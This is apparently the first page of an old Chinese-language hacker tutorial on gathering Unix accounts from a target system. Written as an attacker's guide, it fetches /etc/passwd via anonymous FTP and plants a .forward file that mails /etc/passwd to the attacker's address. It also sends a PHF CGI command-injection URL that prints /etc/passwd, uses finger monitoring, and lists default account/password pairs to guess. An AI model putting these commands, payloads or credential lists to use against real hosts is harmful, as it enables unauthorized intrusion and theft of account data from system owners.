确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x，做一个.foward文件传上去，在UNIX下的命令应该是echo"　 /bin/cat /etc/passwd　sed 's/^/ /'　/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信，它会把PASSWD发给你。

如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.

以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<

还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!

很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:

帐号　　　　 密码
----------- ----------------
root　　　　root
sys　　　 　sys/system/bin
bin　　　　 sys/bin
mountfsys　 mountfsys
adm　　　　 adm
uucp　　　　uucp
nuucp　　　 anon
anon　　　　anon
user　　　　user
games　　　 games
install　　 install
reboot　　　给 "command login" 用的
demo　　　　demo
umountfsys　umountfsys
sync　　　　 sync
admin　　　 admin
guest　　　 guest
daemon　　　daemon
________________________________________________________________

有些管理员忘记把他们改掉,那你就发财了!

热门推荐：苹果专题、时尚专题

[1] [2]